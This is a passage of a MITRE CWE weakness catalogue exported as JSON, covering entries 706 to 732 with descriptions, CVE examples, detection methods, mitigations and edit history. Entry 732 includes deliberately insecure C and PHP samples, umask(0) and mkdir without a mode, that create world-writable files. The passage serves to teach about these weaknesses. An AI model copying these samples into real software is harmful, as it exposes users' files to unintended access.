Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"706":{"attr":{"@_ID":"706","@_Name":"Use of Incorrectly-Resolved Name or Reference","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"99","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"159"}},{"attr":{"@_CAPEC_ID":"177"}},{"attr":{"@_CAPEC_ID":"48"}},{"attr":{"@_CAPEC_ID":"641"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"707":{"attr":{"@_ID":"707","@_Name":"Improper Neutralization","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not ensure or incorrectly ensures that structured messages or data are well-formed and that certain security properties are met before being read from an upstream component or sent to a downstream component.","Extended_Description":{"xhtml:p":["If a message is malformed, it may cause the message to be incorrectly interpreted.","Neutralization is an abstract term for any technique that ensures that input (and output) conforms with expectations and is \\"safe.\\" This can be done by:","This weakness typically applies in cases where the product prepares a control message that another process must act on, such as a command or query, and malicious input that was intended as data, can enter the control plane instead. However, this weakness also applies to more general cases where there are not always control implications."],"xhtml:ul":{"xhtml:li":["checking that the input/output is already \\"safe\\" (e.g. validation)","transformation of the input/output to be \\"safe\\" using techniques such as filtering, encoding/decoding, escaping/unescaping, quoting/unquoting, or canonicalization","preventing the input/output from being directly provided by an attacker (e.g. \\"indirect selection\\" that maps externally-provided values to internally-controlled values)","preventing the input/output from being processed at all"]}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"276"}},{"attr":{"@_CAPEC_ID":"277"}},{"attr":{"@_CAPEC_ID":"278"}},{"attr":{"@_CAPEC_ID":"279"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"33"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"468"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"83"}},{"attr":{"@_CAPEC_ID":"84"}}]},"Notes":{"Note":{"#text":"Concepts such as validation, data transformation, and neutralization are being refined, so relationships between CWE-20 and other entries such as CWE-707 may change in future versions, along with an update to the Vulnerability Theory document.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":[{"#text":"Failure to Enforce that Messages or Data are Well-Formed","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Enforcement of Message or Data Structure","attr":{"@_Date":"2020-02-24"}}]}},"708":{"attr":{"@_ID":"708","@_Name":"Incorrect Ownership Assignment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software assigns an owner to a resource, but the owner is outside of the intended control sphere.","Extended_Description":"This may allow the resource to be manipulated by actors outside of the intended control sphere.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"282","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"345","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"],"Note":"An attacker could read and modify data for which they do not have permissions to access directly."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Policy","Description":"Periodically review the privileges and their owners."},{"Phase":"Testing","Description":"Use automated tools to check for privilege settings."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5101","Description":"File system sets wrong ownership and group when creating a new file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5101"},{"Reference":"CVE-2007-4238","Description":"OS installs program with bin owner/group, allowing modification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4238"},{"Reference":"CVE-2007-1716","Description":"Manager does not properly restore ownership of a reusable resource when a user logs out, allowing privilege escalation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1716"},{"Reference":"CVE-2005-3148","Description":"Backup software restores symbolic links with incorrect uid/gid.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3148"},{"Reference":"CVE-2005-1064","Description":"Product changes the ownership of files that a symlink points to, instead of the symlink itself.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1064"},{"Reference":"CVE-2011-1551","Description":"Component assigns ownership of sensitive directory tree to a user account, which can be leveraged to perform privileged operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1551"}]},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This overlaps verification errors, permissions, and privileges.","A closely related weakness is the incorrect assignment of groups to a resource. It is not clear whether it would fall under this entry or require a different entry."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"710":{"attr":{"@_ID":"710","@_Name":"Improper Adherence to Coding Standards","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not follow certain coding rules for development, which can lead to resultant weaknesses or increase the severity of the associated vulnerabilities.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Document and closely follow coding standards."},{"Phase":["Testing","Implementation"],"Description":"Where possible, use automated tools to enforce the standards."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"}],"Previous_Entry_Name":{"#text":"Coding Standards Violation","attr":{"@_Date":"2017-11-08"}}}},"732":{"attr":{"@_ID":"732","@_Name":"Incorrect Permission Assignment for Critical Resource","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.","Extended_Description":"When a resource is given a permissions setting that provides access to a wider range of actors than required, it could lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is especially dangerous when the resource is related to program configuration, execution or sensitive user data.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","The developer might make certain assumptions about the environment in which the product operates - e.g., that the software is running on a single-user system, or the software is only accessible to trusted administrators. When the software is running in a different environment, the permissions become a problem."]}},{"Phase":"Installation","Note":"The developer may set loose permissions in order to minimize problems when the user first runs the program, then create documentation stating that permissions should be tightened. Since system administrators and users do not always read the documentation, this can result in insecure permissions being left unchanged."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker may be able to read sensitive information from the associated resource, such as credentials or configuration information stored in a file."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker may be able to modify critical properties of the associated resource to gain privileges, such as replacing a world-writable executable with a Trojan horse."},{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"],"Note":"An attacker may be able to destroy or corrupt critical data in the associated resource, such as deletion of records from a database."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc. Automated techniques may be able to detect the use of library functions that modify permissions, then analyze function calls for arguments that contain potentially insecure values.","However, since the software\'s intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated static analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes.","When custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated static analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments."]}},{"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["Automated dynamic analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc.","However, since the software\'s intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated dynamic analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes.","When custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated dynamic analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments."]}},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Manual Static Analysis","Description":"Manual static analysis may be effective in detecting the use of custom permissions models and functions. The code could then be examined to identifying usage of the related functions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software."},{"Method":"Manual Dynamic Analysis","Description":"Manual dynamic analysis may be effective in detecting the use of custom permissions models and functions. The program could then be executed with a focus on exercising code paths that are related to the custom permissions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software."},{"Method":"Fuzzing","Description":"Fuzzing is not effective in detecting this weakness."},{"attr":{"@_Detection_Method_ID":"DM-11.1"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and watch for library functions or system calls on OS resources such as files, directories, and shared memory. Examine the arguments to these calls to infer which permissions are being used."]},"Effectiveness_Notes":"Note that this technique is only useful for permissions issues related to system resources. It is not likely to detect application-level business rules that are related to permissions, such as if a user of a blog system marks a post as \\"private,\\" but the blog system inadvertently marks it as \\"public.\\""},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inter-application Flow Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria","Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host Application Interface Scanner"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Forced Path Execution"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When using a critical resource such as a configuration file, check to see if the resource has insecure permissions (such as being modifiable by any regular user) [REF-62], and generate an error or even exit the software if there is a possibility that the resource could have been modified by an unauthorized party."},{"Phase":"Architecture and Design","Description":"Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully defining distinct user groups, privileges, and/or roles. Map these against data, functionality, and the related resources. Then set the permissions accordingly. This will allow you to maintain more fine-grained control over your resources. [REF-207]","Effectiveness":"Moderate","Effectiveness_Notes":"This can be an effective strategy. However, in practice, it may be difficult or time consuming to define these areas when there are many different resources or user types, or if the applications features change rapidly."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"Phase":["Implementation","Installation"],"Description":"During program startup, explicitly set the default permissions or umask to the most restrictive setting possible. Also set the appropriate permissions during program installation. This will prevent you from inheriting insecure permissions from any user who installs or runs the program.","Effectiveness":"High"},{"Phase":"System Configuration","Description":"For all configuration files, executables, and libraries, make sure that they are only readable and writable by the software\'s administrator.","Effectiveness":"High"},{"Phase":"Documentation","Description":"Do not suggest insecure configuration changes in documentation, especially if those configurations can extend to resources and other programs that are outside the scope of the application."},{"Phase":"Installation","Description":"Do not assume that a system administrator will manually change the configuration to the settings that are recommended in the software\'s manual."},{"attr":{"@_Mitigation_ID":"MIT-37"},"Phase":["Operation","System Configuration"],"Strategy":"Environment Hardening","Description":"Ensure that the software runs properly under the Federal Desktop Core Configuration (FDCC) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code sets the umask of the process to 0 before creating a file and writing \\"Hello world\\" into the file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define OUTFILE \\"hello.out\\"umask(0);FILE *out;out = fopen(OUTFILE, \\"w\\");if (out) {}","xhtml:br":["","","","","","",""],"xhtml:i":"/* Ignore CWE-59 (link following) for brevity */","xhtml:div":{"#text":"fprintf(out, \\"hello world!\\\\n\\");fclose(out);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"result"},"xhtml:div":"-rw-rw-rw- 1 username 13 Nov 24 17:58 hello.out"}],"Body_Text":["After running this program on a UNIX system, running the \\"ls -l\\" command might return the following output:","The \\"rw-rw-rw-\\" string indicates that the owner, group, and world (all users) can read the file and write to it."]},{"Intro_Text":"This code creates a home directory for a new user, and makes that user the owner of the directory. If the new directory cannot be owned by the user, the directory is deleted.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function createUserDir($username){}","xhtml:div":{"#text":"$path = \'/home/\'.$username;if(!mkdir($path)){}if(!chown($path,$username)){}return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"return false;","attr":{"@_style":"margin-left:10px;"}},{"#text":"rmdir($path);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}},"Body_Text":["Because the optional \\"mode\\" argument is omitted from the call to mkdir(), the directory is created with the default permissions 0777. Simply setting the new user as the owner of the directory does not explicitly change the permissions of the directory, leaving it with the default. This default allows any user to read and write to the directory, allowing an attack on the user\'s files. The code also fails to change the owner group of the directory, which may result in access by unexpected groups.","This code may also be vulnerable to Path Traversal (CWE-22) attacks if an attacker supplies a non alphanumeric username."]},{"Intro_Text":"The following code snippet might be used as a monitor to periodically record whether a web site is alive. To ensure that the file can always be modified, the code uses chmod() to 